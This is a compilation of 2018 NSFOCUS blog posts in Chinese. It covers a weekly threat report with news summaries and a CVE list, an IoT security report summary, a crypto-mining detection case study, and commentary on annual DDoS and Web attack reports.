- 链接：http://toutiao.secjia.com/dhs-it-security
标题：只感染了100台电脑的恶意软件“弹弓” 卡巴发了25页的报告
- 时间：2018.03.13
- 摘要：卡巴发布了一份报告，称发现了潜伏6年的路由器恶意软件Slingshot弹弓，虽然在全球只感染了100多台计算机，但其功能异常复杂，其背后的开发人员已经花费了大量的时间和金钱。
- 链接：http://toutiao.secjia.com/router-malware-slingshot
标题： AMD安全处理器爆出4种类型13个0Day漏洞可以窃取数据并安装恶意软件
- 时间：2018.03.14
- 摘要：intel cpu漏洞刚过去，AMD CPU 0Day漏洞又来了。研究人员周二表示，他们发现了各种AMD芯片中的4种类型13个关键安全漏洞，据称将这些漏洞可以让攻击者窃取安装AMD CPU的设备上的敏感数据，并可以安装恶意软件，包括服务器、工作站和笔记本电脑。这四种漏洞类型包括Chimera漏洞、Ryzenfall漏洞、Fallout漏洞、Masterkey漏洞。
- 链接：http://toutiao.secjia.com/amd-ryzen-epyc-chips-flaws
标题：13万多美国公民个人信息数据泄露纽约一家医院服务器遭入侵
- 时间：2018.03.15
- 摘要：纽约州奥尔巴尼的一家医院的服务器遭受攻击，在未经授权的一方获得服务器访问权限时，发生了数据泄露，约135,000名美国公民个人信息发生数据泄露。
- 链接：http://toutiao.secjia.com/ny-hospital-databreach
标题：暗网中的快递 BlackTDS流量分发服务恶意软件及攻击工具包快件直达
- 时间：2018.03.15
- 摘要：暗网正在销售新的恶意软件流量分发系统BlackTDS并提供相关服务，并且正在推广，称BlackTDS是作为部署攻击工具包exploit kit和恶意软件的经济实惠方式。
- 链接：http://toutiao.secjia.com/black-tds-cloud-tds
标题：SOFACY APT ADOPTS NEW TACTICS AND FAR EAST TARGETS
- 时间：2018-03-09
- 摘要：A new analysis of the Russian-speaking Sofacy APT gang shows a continual march toward Far East targets and overlapping of activities with other groups such as Lamberts, Turla and Danti.
- 链接：https://threatpost.com/sofacy-apt-adopts-new-tactics-and-far-east-targets/130337/
标题：CredSSP Flaw in Remote Desktop Protocol Affects All Versions of Windows
- 时间：2018-03-13
- 摘要：A critical vulnerability has been discovered in Credential Security Support Provider protocol (CredSSP) that affects all versions of Windows to date and could allow remote attackers to exploit RDP and WinRM to steal data and run malicious code.
- 链接：https://thehackernews.com/2018/03/credssp-rdp-exploit.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29
标题：N1CTF国际赛句型
- 时间：2018-03-13
- 摘要：北京时间3月10日早上9点N1CTF国际赛正式拉开战幕。N1CTF国际赛由国内知名战队Nu1L战队主办命题
- 链接：http://www.youxia.org/2018/03/37095.html
标题：Warning – 3 Popular VPN Services Are Leaking Your IP Address
- 时间：2018-03-15
- 摘要：Researchers found critical vulnerabilities in three popular VPN services that could leak users’ real IP addresses and other sensitive data.
- 链接：https://thehackernews.com/2018/03/vpn-leak-ip-address.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29
标题：Palo Alto Networks to Acquire CIA-Backed Cloud Security Firm Evident.io for $300 Million
- 时间：2018-03-15
- 摘要：Network security firm Palo Alto Networks (NYSE: PANW) on Wednesday said that it has agreed to acquire cloud security and compliance firm Evident.io for $300 million in cash
- 链接：https://www.securityweek.com/palo-alto-networks-acquire-cia-backed-cloud-security-firm-evidentio-300-million?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29

（数据来源：绿盟科技威胁情报与网络安全实验室收集整理）

三. 漏洞研究

3.1 漏洞库统计

截止到2018年3月16日，绿盟科技漏洞库已收录总条目达到39135条。

Cisco Web Security Appliance FTP身份验证绕过漏洞
- 危险等级:中
- cve编号:CVE-2018-0087
Cisco Videoscape AnyRes Live跨站脚本漏洞
- 危险等级:中
- cve编号:CVE-2018-0220
IBM Security Guardium Big Data Intelligence信息泄露漏洞（CVE-2018-1372）
- 危险等级:低
- BID:103237
- cve编号:CVE-2018-1372
F5 BIG-IP ASM远程拒绝服务漏洞（CVE-2017-6154）
- 危险等级:低
- BID:103233
- cve编号:CVE-2017-6154
GraphicsMagick ReadOnePNGImage拒绝服务漏洞（CVE-2017-18219）
- 危险等级:中
- BID:103258
- cve编号:CVE-2017-18219
Cisco Identity Services Engine本地命令注入漏洞（CVE-2018-0221）
- 危险等级:中
- BID:103347
- cve编号:CVE-2018-0221
libTIFF 远程代码执行漏洞（CVE-2016-5314）
- 危险等级:中
- BID:91195
- cve编号:CVE-2016-5314
Kingsoft WPS Office Free拒绝服务漏洞（CVE-2018-6400）
- 危险等级:中
- cve编号:CVE-2018-6400
Apache Tomcat JK ISAPI Connector信息泄露漏洞（CVE-2018-1323）
- 危险等级:低
- cve编号:CVE-2018-1323
Linux kernel unimac_mdio_probe函数拒绝服务漏洞（CVE-2018-8043）
- 危险等级:低
- cve编号:CVE-2018-8043
Schneider Electric多个产品DLL加载本地代码执行漏洞（CVE-2018-7239）
- 危险等级:中
- BID:103338
- cve编号:CVE-2018-7239
Linux Kernel ‘arch/x86/kernel/cpu/mcheck/mce.c’本地拒绝服务漏洞（CVE-2018-7995）
- 危险等级:中
- BID:103356
- cve编号:CVE-2018-7995
libvirt 安全限制绕过漏洞（CVE-2018-6764）
- 危险等级:中
- cve编号:CVE-2018-6764
NTP decodearr函数缓冲区溢出漏洞（CVE-2018-7183）
- 危险等级:中
- BID:103351
- cve编号:CVE-2018-7183
QEMU 拒绝服务漏洞（CVE-2018-7858）
- 危险等级:低
- BID:103350
- cve编号:CVE-2018-7858
Linux Kernel 本地拒绝服务漏洞（CVE-2017-18222）
- 危险等级:低
- BID:103349
- cve编号:CVE-2017-18222
Linux Kernel ‘drivers/scsi/libsas/sas_expander.c’拒绝服务漏洞（CVE-2018-7757）
- 危险等级:中
- BID:103348
- cve编号:CVE-2018-7757
ManageEngine Applications Manager远程代码执行漏洞（CVE-2018-7890）
- 危险等级:中
- BID:103358
- cve编号:CVE-2018-7890
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0811）
- 危险等级:中
- BID:103232
- cve编号:CVE-2018-0811
Microsoft ASP.NET Core拒绝服务漏洞（CVE-2018-0808）
- 危险等级:高
- BID:103226
- cve编号:CVE-2018-0808
Microsoft ASP.NET Core远程权限提升漏洞（CVE-2018-0787）
- 危险等级:中
- BID:103282
- cve编号:CVE-2018-0787
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0813）
- 危险等级:中
- BID:103250
- cve编号:CVE-2018-0813
Microsoft Windows Remote Assistance信息泄露漏洞（CVE-2018-0878）
- 危险等级:低
- BID:103230
- cve编号:CVE-2018-0878
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0814）
- 危险等级:中
- BID:103251
- cve编号:CVE-2018-0814
Microsoft Windows GDI权限提升漏洞（CVE-2018-0815）
- 危险等级:中
- BID:103234
- cve编号:CVE-2018-0815
Microsoft Windows GDI权限提升漏洞（CVE-2018-0816）
- 危险等级:高
- BID:103248
- cve编号:CVE-2018-0816
Microsoft Windows GDI权限提升漏洞（CVE-2018-0817）
- 危险等级:高
- BID:103249
- cve编号:CVE-2018-0817
Microsoft Windows Installer权限提升漏洞（CVE-2018-0868）
- 危险等级:高
- BID:103236
- cve编号:CVE-2018-0868
Microsoft Edge Chakra脚本引擎内存破坏漏洞（CVE-2018-0872）
- 危险等级:低
- BID:103267
- cve编号:CVE-2018-0872
Microsoft Edge Chakra脚本引擎内存破坏漏洞（CVE-2018-0873）
- 危险等级:低
- BID:103268
- cve编号:CVE-2018-0873
Microsoft Edge Chakra脚本引擎内存破坏漏洞（CVE-2018-0874）
- 危险等级:低
- BID:103269
- cve编号:CVE-2018-0874
.NET Core 拒绝服务漏洞（CVE-2018-0875）
- 危险等级:高
- BID:103225
- cve编号:CVE-2018-0875
Microsoft Edge 脚本引擎内存破坏漏洞（CVE-2018-0876）
- 危险等级:低
- BID:103289
- cve编号:CVE-2018-0876
Windows Desktop Bridge VFS权限提升漏洞（CVE-2018-0877）
- 危险等级:高
- BID:103227
- cve编号:CVE-2018-0877
Microsoft Edge 信息泄露漏洞（CVE-2018-0879）
- 危险等级:低
- BID:103303
- cve编号:CVE-2018-0879
Microsoft Internet Explorer/Edge信息泄露漏洞（CVE-2018-0891）
- 危险等级:高
- BID:103309
- cve编号:CVE-2018-0891
Microsoft Internet Explorer脚本引擎远程内存破坏漏洞（CVE-2018-0889）
- 危险等级:高
- BID:103295
- cve编号:CVE-2018-0889
Microsoft Windows Desktop Bridge本地权限提升漏洞（CVE-2018-0882）
- 危险等级:高
- BID:103257
- cve编号:CVE-2018-0882
Microsoft Windows Video Control本地权限提升漏洞（CVE-2018-0881）
- 危险等级:高
- BID:103256
- cve编号:CVE-2018-0881
Microsoft Windows Desktop Bridge本地权限提升漏洞（CVE-2018-0880）
- 危险等级:高
- BID:103239
- cve编号:CVE-2018-0880
Microsoft Windows Device Guard本地安全限制绕过漏洞（CVE-2018-0884）
- 危险等级:中
- BID:103260
- cve编号:CVE-2018-0884
Microsoft Windows Shell远程代码执行漏洞（CVE-2018-0883）
- 危险等级:中
- BID:103259
- cve编号:CVE-2018-0883
Microsoft Windows Hyper-V拒绝服务漏洞（CVE-2018-0885）
- 危险等级:中
- cve编号:CVE-2018-0885
Microsoft Windows 远程代码执行漏洞（CVE-2018-0886）
- 危险等级:中
- BID:103265
- cve编号:CVE-2018-0886
Microsoft Windows Hyper-V本地信息泄露漏洞（CVE-2018-0888）
- 危险等级:高
- BID:103262
- cve编号:CVE-2018-0888
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0900）
- 危险等级:低
- BID:103244
- cve编号:CVE-2018-0900
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0901）
- 危险等级:低
- BID:103245
- cve编号:CVE-2018-0901
Microsoft Windows Kernel ‘cng.sys’安全限制绕过漏洞（CVE-2018-0902）
- 危险等级:中
- BID:103266
- cve编号:CVE-2018-0902
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0898）
- 危险等级:低
- BID:103242
- cve编号:CVE-2018-0898
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0899）
- 危险等级:低
- BID:103243
- cve编号:CVE-2018-0899
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0897）
- 危险等级:低
- BID:103241
- cve编号:CVE-2018-0897
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0896）
- 危险等级:低
- BID:103240
- cve编号:CVE-2018-0896
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0895）
- 危险等级:低
- BID:103238
- cve编号:CVE-2018-0895
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0894）
- 危险等级:低
- BID:103231
- cve编号:CVE-2018-0894
Microsoft Edge 远程内存破坏漏洞（CVE-2018-0893）
- 危险等级:低
- BID:103288
- cve编号:CVE-2018-0893
Microsoft Access远程代码执行漏洞（CVE-2018-0903）
- 危险等级:中
- BID:103315
- cve编号:CVE-2018-0903
Microsoft Excel安全限制绕过漏洞（CVE-2018-0907）
- 危险等级:中
- BID:103325
- cve编号:CVE-2018-0907
Microsoft SharePoint Server远程权限提升漏洞（CVE-2018-0909）
- 危险等级:中
- BID:103279
- cve编号:CVE-2018-0909
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0904）
- 危险等级:中
- BID:103246
- cve编号:CVE-2018-0904
Microsoft Windows Storage Services本地权限提升漏洞（CVE-2018-0983）
- 危险等级:高
- BID:103381
- cve编号:CVE-2018-0983
Microsoft Windows Kernel ‘Win32k.sys’本地权限提升漏洞（CVE-2018-0977）
- 危险等级:中
- BID:103380
- cve编号:CVE-2018-0977
Microsoft SharePoint Server远程权限提升漏洞（CVE-2018-0947）
- 危险等级:中
- BID:103306
- cve编号:CVE-2018-0947
Microsoft SharePoint Server远程权限提升漏洞（CVE-2018-0911）
- 危险等级:中
- BID:103281
- cve编号:CVE-2018-0911
Microsoft Exchange Server信息泄露漏洞（CVE-2018-0924）
- 危险等级:低
- BID:103320
- cve编号:CVE-2018-0924
Microsoft SharePoint Server远程权限提升漏洞（CVE-2018-0912）
- 危险等级:中
- BID:103285
- cve编号:CVE-2018-0912
Microsoft SharePoint Server远程权限提升漏洞（CVE-2018-0917）
- 危险等级:中
- BID:103296
- cve编号:CVE-2018-0917
Microsoft Office信息泄露漏洞（CVE-2018-0919）
- 危险等级:中
- BID:103311
- cve编号:CVE-2018-0919
Microsoft SharePoint Server远程权限提升漏洞（CVE-2018-0916）
- 危险等级:中
- BID:103294
- cve编号:CVE-2018-0916
Microsoft SharePoint Server远程权限提升漏洞（CVE-2018-0915）
- 危险等级:中
- BID:103293
- cve编号:CVE-2018-0915
Microsoft SharePoint Server远程权限提升漏洞（CVE-2018-0914）
- 危险等级:中
- BID:103291
- cve编号:CVE-2018-0914
Microsoft SharePoint Server远程权限提升漏洞（CVE-2018-0921）
- 危险等级:中
- BID:103302
- cve编号:CVE-2018-0921
Microsoft SharePoint Server远程权限提升漏洞（CVE-2018-0913）
- 危险等级:中
- BID:103290
- cve编号:CVE-2018-0913
Microsoft Office内存破坏漏洞（CVE-2018-0922）
- 危险等级:中
- BID:103314
- cve编号:CVE-2018-0922
Microsoft SharePoint Server远程权限提升漏洞（CVE-2018-0944）
- 危险等级:中
- BID:103304
- cve编号:CVE-2018-0944
Microsoft Exchange Server信息泄露漏洞（CVE-2018-0941）
- 危险等级:低
- BID:103318
- cve编号:CVE-2018-0941
Microsoft Exchange Server远程权限提升漏洞（CVE-2018-0940）
- 危险等级:中
- BID:103323
- cve编号:CVE-2018-0940
Microsoft SharePoint Server远程权限提升漏洞（CVE-2018-0923）
- 危险等级:中
- BID:103308
- cve编号:CVE-2018-0923
Microsoft Internet Explorer/Edge信息泄露漏洞（CVE-2018-0927）
- 危险等级:低
- BID:103310
- cve编号:CVE-2018-0927
Microsoft Internet Explorer信息泄露漏洞（CVE-2018-0929）
- 危险等级:低
- BID:103299
- cve编号:CVE-2018-0929
Microsoft Internet Explorer/Edge信息泄露漏洞（CVE-2018-0932）
- 危险等级:低
- BID:103307
- cve编号:CVE-2018-0932
Microsoft Internet Explorer远程权限提升漏洞（CVE-2018-0942）
- 危险等级:低
- BID:103312
- cve编号:CVE-2018-0942
Microsoft ChakraCore脚本引擎内存破坏漏洞（CVE-2018-0937）
- 危险等级:低
- BID:103271
- cve编号:CVE-2018-0937
Microsoft ChakraCore脚本引擎信息泄露漏洞（CVE-2018-0939）
- 危险等级:低
- BID:103305
- cve编号:CVE-2018-0939
Microsoft ChakraCore脚本引擎内存破坏漏洞（CVE-2018-0936）
- 危险等级:低
- BID:103270
- cve编号:CVE-2018-0936
Microsoft ChakraCore脚本引擎内存破坏漏洞（CVE-2018-0933）
- 危险等级:低
- BID:103274
- cve编号:CVE-2018-0933
Microsoft ChakraCore 脚本引擎内存破坏漏洞（CVE-2018-0934）
- 危险等级:低
- BID:103275
- cve编号:CVE-2018-0934
Microsoft Internet Explorer脚本引擎内存破坏漏洞（CVE-2018-0935）
- 危险等级:高
- BID:103298
- cve编号:CVE-2018-0935
Microsoft ChakraCore脚本引擎内存破坏漏洞（CVE-2018-0930）
- 危险等级:低
- BID:103272
- cve编号:CVE-2018-0930
Microsoft ChakraCore脚本引擎内存破坏漏洞（CVE-2018-0931）
- 危险等级:低
- BID:103273
- cve编号:CVE-2018-0931
Microsoft Windows Kernel信息泄露漏洞（CVE-2018-0926）
- 危险等级:中
- BID:103247
- cve编号:CVE-2018-0926
Microsoft ChakraCore脚本引擎内存破坏漏洞（CVE-2018-0925）
- 危险等级:低
- BID:103287
- cve编号:CVE-2018-0925

（数据来源：绿盟科技安全研究部&产品规则组）

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/nsfocus-report-201811/

Tags: CredSSP, CVE-2018-0886, 互联网安全威胁态势, 安全周报, 绿盟科技

↧

【安全报告】2017物联网安全年报

March 29, 2018, 1:01 am

≫ Next: 你挖矿，我挖你——绿盟安全态势感知平台变身应对非法挖矿事件“头号玩家”

≪ Previous: 绿盟科技互联网安全威胁周报 NSFOCUS-18-11

在“互联网 +”时代，物联网发展迅猛，正加速渗透到生产、消费和社会管理等各领域，物联网设备规模呈现爆发性增长趋势，万物互联时代正在到来。

根据咨询机构Gartner报告，2015年物联网设备只有29亿，而2020年将会达到204亿。物联网应用广泛分布在各行各业。智慧城市、智慧家庭、智能交通、智能物流，都是由物联网相关应用来支撑。随着不同类型的感测设备面世，会有越来越多的物联网应用出现。城市中的共享单车是教大的单品物联网应用，每个单车配备的物联网锁，通过手机扫描二维码实现远程解锁，在车辆骑乘中进行卫星定位。

物联网资产的暴露情况

在物联网相关的安全问题越来越引起关注的背景下，对这些资产进行分析和梳理是有必要的。

可预知的是，在2020年以前，物联网操作系统将在支持的无线连接类型、物联网应用层协议等功能方面得到丰富、完善，安全性也将进一步提高。

统计暴露在互联网上的云服务数量，分析这些云服务有助于我们进一步分析隐藏在网关后面的物联网设备数量、活跃度和行为特征。

物联网设备脆弱性分析

物联网设备安全性影响到人们正常生活，严重的会影响到生命安全，我们从多个维度分析物联网设备的脆弱性。

攻击者会实施设备选型、本地漏洞挖掘、制作工具、受影响设备资产统计，以及最终的利益转换5个步骤。

物联网设备的常见脆弱点包括硬件接口暴露、弱口令、信息泄露及未授权访问。

物联网设备的威胁风险分析

针对物联网设备的安全威胁主要包括网络嗅探、远程代码执行、中间人攻击和通过云端（移动端）控制物联网设备。

物联网设备所面临的安全风险，需要从物联网设备用户和物联网设备厂商两个不同的角度去考虑。

可以预期，物联网威胁所带来的破坏和影响，会因为技术快速发展过程中安全投入的不平衡而继续扩大。

物联网安全解决方案

物联网安全防护思路可分成三个层面：感知层、网络层、平台和应用层，如图所示，每层防护侧重有所不同。

报告下载

2017物联网安全年报

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/2017-iot-security-annual-report/

Tags: 物联网, 物联网安全, 绿盟科技

↧

你挖矿，我挖你——绿盟安全态势感知平台变身应对非法挖矿事件“头号玩家”

April 16, 2018, 3:15 am

≫ Next: 年度网络安全观察之我见

≪ Previous: 【安全报告】2017物联网安全年报

2018年3月30日，在某地市级监管部门，绿盟安全态势感知平台挖矿检测功能一上线，就发现了几处疑似挖矿行为，通过平台的大数据分析能力和溯源能力，最终成功定位几起隐藏极深的变种门罗币挖矿木马事件，并完整重现了事件过程。

近年来，虚拟货币 “非法挖矿”事件频频发生，为此，绿盟科技态势感知团队针对性开展了应对 “非法挖矿”事件的专项研究和技术创新。2018年3月30日，在某地市级监管部门，绿盟安全态势感知平台挖矿检测功能一上线，就发现了几处疑似挖矿行为，通过平台的大数据分析能力和溯源能力，最终成功定位几起隐藏极深的变种门罗币挖矿木马事件，并完整重现了事件过程。下面就简单的和小伙伴们分享一下整个事件的始末吧。

首先，利用绿盟安全态势感知平台，通过攻击链分析视图，可以发现客户某重要资产IP最近两天正在发生网络恶意活动（如图1所示）。

图1 客户某重要资产IP存在恶意活动

通过平台的下钻分析功能可以发现该IP存在网络入侵威胁事件，攻击方式为挖矿事件。相关的告警信息如下（如图2所示）。

图2 客户某IP存在网络入侵-挖矿事件

然后，通过态势感知平台留存的历史IPS告警信息，分析payload，可以得到该挖矿事件背后的攻击者钱包ID信息，攻击进程信息等（如图3所示），进一步推断该事件为非法挖矿事件。

图3 挖矿外联数据包payload详情

最后，通过查看挖矿链接的payload信息（如图4所示）以及查看矿池域名（如图5所示）可以推断该非法挖矿事件为门罗币挖矿事件。

图4 挖矿链接的payload信息

图5 挖矿主机外联的矿池域名

将攻击事件上报给客户后，客户立即前往受害资产现场进行核实，通过登录受害主机实地查看验证态势感知平台网络攻击告警事件的准确性。经过客户专家的现场确认，受害主机确实被黑客种植了挖矿木马，程序为xmr-stak（如图6所示）。该事件得到了有效验证，证明了绿盟安全态势感知平台在感知网络安全威胁事件方面切实发挥了效果，客户方也对绿盟科技的技术实力表示了高度认可。

图6 “挖矿事件”受害服务器

近年来，绿盟安全态势感知平台多次在重大安保活动中承担重要角色，在网络安全保卫工作中发挥突出作用，受到了业界客户的普遍认可。例如“金砖五国”会议保障期间，通过绿盟安全态势感知平台检测到多起高危事件，包括某单位大规模”永恒之蓝”事件；在“十九”大保障期间应对江苏、浙江、重庆等十五个省市重点客户的保障，并做到“零”重大责任事故发生。

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/tsa-dealing-illegal-mining-events/

Tags: TSA, 挖矿, 绿盟安全态势感知平台, 绿盟科技, 网络入侵威胁, 非法挖矿

↧

年度网络安全观察之我见

April 21, 2018, 9:01 am

≫ Next: 《2017年DDoS与Web应用攻击态势报告》之我见|当前网络安全现状概述

≪ Previous: 你挖矿，我挖你——绿盟安全态势感知平台变身应对非法挖矿事件“头号玩家”

孙子曰“知己知彼，百战不殆”，话又说“知易行难”。知己已是不易，各种开源软件涌入信息系统，各种API调来调去供应链越来越长，各种微服务“一言不合”就上线。

这种动态环境下，知己 – 清楚地了解洞悉自身网络中的资产、价值和安全属性、逻辑分布和依赖关系等无疑很挑战。但知彼更难挑战。“彼”的识别就是个大问题。什么目标和动机？定向的，还是非定向的；什么技术水平？高级的，还是一般的；当前什么趣向，什么漏洞和利用在流行？数百万的安全告警背后分别是什么威胁？

这份报告，结合绿盟科技威胁情报中心（NTI）丰富的威胁情报数据，针对攻防中最重要的关注点对2017年网络安全态势进行了梳理，从漏洞披露、恶意流量监控、恶意软件的发展演变多个角度，结合地区、行业的属性，对2017年网络安全态势进行了分析解读。这些威胁都是日常运维中最常面对的，这份报告是是结合了NTI最新的情报数据进行的综合分析，希望能够为企业用户以及网络安全领域的从业者提供参考和帮助。

Web类攻击的行业分布

由于各个行业的业务特性都不相同，黑客攻击在不同行业中的呈现侧重点是不一样的。在互联网企业中，业务环境复杂，大量的业务需要提供Web界面为客户提供服务，其背后还需要架设复杂的IT架构提供相应的技术支撑，使得Web类、系统类的攻击在互联网行业中都非常突出，对防护方案的要求也会更加苛刻。从业务流量上看互联网Web服务的流量占比是最高的，但是，单从行业自身业务特征看，运营商、教育、制造、政府行业都应该重点关注Web类的攻击，进行重点防护。

屡禁不绝的DDoS攻击

DDoS攻击、Web攻击、系统漏洞利用这些攻击始终在互联网环境中逡巡，不管你是否关注，它就在那里。2017 年同去年同期相比，攻击发生次数基本保持平稳，共计发生20.7 万次。但是从攻击总流量上来看有较为明显的波动，从年初到年中5 月份前后，攻击总流量有非常显著的增长，而5 月份之后攻击总流量回落至较为平稳的水平。与2016 年相比，2017 攻击仍然频繁，攻击总流量大幅上升。

值得关注的一些新趋势：

今年来自IoT设备的攻击占比达到了12%；
DDoS攻击武器库新增一种攻击反射攻击类型：Memchached，从各类反射型攻击的放大倍率来看，Memcached 高居榜首，最高可达51000 倍；

你知道鬼影吗？

“鬼影”是一个在中国非常活跃的僵尸网络，是基于Windows平台发展的一个影响广泛的僵尸网络。在近期Botnet活动监测中，我们看到“鬼影”的活动十分频繁，这个家族出现时间早、变种多，具有相当成熟的商业运作。对此，我们认为需要特别关注和治理。

活跃Botnet家族指令数量统计

“鬼影”目前至少存在10个不同的版本，每个版本与之前一个版本相比都增加了新的功能，DDoS攻击技术也不断升级迭代。目前“鬼影”已经成为一个可发动大流量攻击、可大规模传播、支持不同模式商业运作的成熟软件。

2017年最突出的恶意软件——你造吗？

2017年最突出的恶意软件类型就是勒索软件：
2017年5月12日，WannaCry勒索病毒借助EternalBlue（永恒之蓝）漏洞肆虐全球，影响超过150个国家，中毒用户要去在72小时内支付价值300美金的比特币，并且3天后勒索赎金就会翻番，7天后拒付赎金，计算机文件将被永久加密
2017年6月爆发的NotPetya勒索病毒同样采用EternalBlue（永恒之蓝）漏洞传播，病毒会修改系统的MBR引导代码这将使病毒在电脑重启时得到执行，该病毒会在开机时提示用户电脑正在进行磁盘扫描然而实际上病毒正在执行文件加密等操作。当所有加密操作完成后，病毒才弹出勒索软件，要求受害者付价值300美金的比特币。在2017年7月，病毒作者公布了Petya系列勒索软件的所有密匙。
2017年10月，BadRabbit(坏兔子)勒索软件爆发，攻击者首先入侵新闻媒体类网站，随后利用这些新闻类网站发起水坑攻击。BadRabbit要求受害者在40小时内支付05比特币（当时约合300美元）。

写在最后的话

《2017年度网络安全观察》报告基于绿盟科技威胁情报中心数据，从漏洞态势、攻击态势、恶意软件态势三个角度，对2017年度网络安全的态势变化进行了分析。我们分析了攻击者、受害者的行业、地区分布等信息，这些基础威胁统计信息可以作为UEBA/安全行为分析的重要输入，建立更智能的安全检测体系。此外，2017年，在我们持续监控的超过390万个攻击源中，约20%的恶意IP曾对多个目标进行过攻击，0.39%的攻击源对90%的攻击事件负责。对这些“惯犯”的针对性跟踪、分析、画像、对抗等可以有效地提高安全防护的效率和效果，相应地，“惯犯”覆盖也将成为最为核心的威胁情报能力之一。

同时，我们对例如DDoS、系统攻击、Web攻击等常见攻击进行了观察，还把物联网设备漏洞以及借助物联网平台发动的攻击等也纳入到观察视野范围内。绿盟威胁情报中心数据显示，物联网设备IP已占有总恶意IP的12%，物联网设备中恶意IP所占物联网总IP数量的比例达到4.8%，是普通IP空间相应恶意IP占比的3倍。

不难预计，物联网设备带来的安全威胁将继续不断升高，对物联网威胁的相应防护能力将会成为安全防护体系的标配。

参考：http://blog.nsfocus.net/2017-security-observation-report/

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/security-observation-report-analyze/

Tags: 2017年度网络安全观察, 2017年最突出的恶意软件, Web类攻击的行业分布, 屡禁不绝的DDoS攻击, 绿盟科技, 绿盟科技威胁情报中心

↧

《2017年DDoS与Web应用攻击态势报告》之我见|当前网络安全现状概述

April 21, 2018, 9:26 am

≫ Next: 绿盟科技互联网安全威胁周报NSFOCUS-18-16

≪ Previous: 年度网络安全观察之我见

当今互联网发展迅猛，基于互联网衍生出来的云计算、大数据、物联网、移动计算等新技术与新模式，深刻地影响着网络世界的变革。在这样的大背景下，网络安全面临的威胁也在不断变化与升级。其中，DDoS攻击和Web应用攻击是当今网络应用面临的较为突出的两大安全威胁。攻击者常常会在攻击链的不同阶段有计划地分别实施这两种或多种攻击，以逐步达到最终的谋利目的。

日前，绿盟科技联合中国电信云堤发布了《2017年DDoS与Web应用攻击态势报告》（以下简称“报告”）。《报告》从规模、频度、攻击源、类型、地域、行业等多维度，多视角全面总结和呈现2017年全年攻击态势的变化情况，特别对2017年热门的物联网僵尸网络进行了深度分析并总结了其发展趋势。最后，结合当前DDoS和Web应用攻击的威胁形式，给出了安全防护的解决方案。

以下是对《报告》部分重点内容的解读。

2017年DDoS攻击态势盘点

1、2017年DDoS攻击规模不断增大，攻击峰值不断突破新高。

一方面，DDoS攻击服务化、产业化；另外一方面，由于物联网的加入，可利用的攻击源种类越来越多，针对物联网的Botnet也在不断升级换代。这些都使得DDoS攻击成本越来越低，攻击规模不断增大。从发展趋势看，企业面临的DDoS攻击威胁将会逐年在扩大。

2017攻击总流量64万TBytes，比2016年增长79.4%。

2、DDoS攻击活动受政策监管和利益驱动的影响明显

2017年6月1日，我国《网络安全法》正式实施，而 DDoS攻击总流量从6月份开始明显呈下降趋势。通过攻击溯源分析，发现下半年基于Windows和Linux/Unix的主机类型的攻击源明显减少，而常用于小规模攻击的物联网设备攻击源显著增多，前者明显计算性能更高。面对国家政策的威慑和监管的强力整治，黑产将掌握的”高性能”Botnet资源从犯罪成本较高的DDoS攻击活动转而投向了犯罪成本相对较低但收益更高的挖矿活动中，反映了黑产对攻击资源的投入受政策监管和利益驱动的影响明显。

Linux/Unix类主机和服务器构成稳固的DDoS攻击源（55%），IoT类设备占12%。

物联网（IoT）攻击源中，以家用路由器或调制解调器类设备占比最高（69.7%）。

虽然IoT较多被用于小型DDoS攻击，但IoT安全问题突出（漏洞多、修复难度大），种类多数量巨大，且针对其的恶意程序不断在升级换代，我们并不能轻易对来自IoT Botnet的威胁放松警惕。

3、Memcached新型反射攻击1.35Tbps攻击峰值引发各方关注

虽然反射攻击频发，但从攻击总流量、攻击规模及可用的反射器数量来看，以NTP Reflection Flood为代表的传统类型反射攻击活动在放缓。就在人们即将放松对反射攻击的警惕时，2018年年初一种新型的反射攻击——Memcached反射放大攻击以1.35Tbps引发各方关注。据绿盟科技威胁情报中心的统计数据显示，全球范围内存在被利用风险的Memcached服务器达104,506台。

《报告》呼吁，各地区、各行业客户保持高度警惕，谨防Memcached反射攻击对服务器造成直接冲击或利用Memcached反射攻击作为障眼法混合其他攻击造成信息安全危害。关于Memcached DRDoS的具体的防护和加固建议请详见《深度剖析Memcached 超大型DRDoS攻击》。

相关链接：http://blog.nsfocus.net/memcached-drdos-analysis/

物联网僵尸网络发展趋势

来自物联网僵尸网络的威胁将继续扩大。

2017年全球暴露的物联网设备约6200万，其中路由器设备最多，总数约4900万台，国内暴露的路由器设备约1092万台。如果假设这部分暴露的设备被感染的概率仅为1%，那么仅国内被感染的路由器设备就能轻松打出T级别的DDoS攻击。按照当前物联网设备令人堪忧的安全状况和修复情况看，暴露在网络中的这些设备被感染的概率要远高于1%，这些资源一旦掌握在不法分子手中，威胁将不可估量。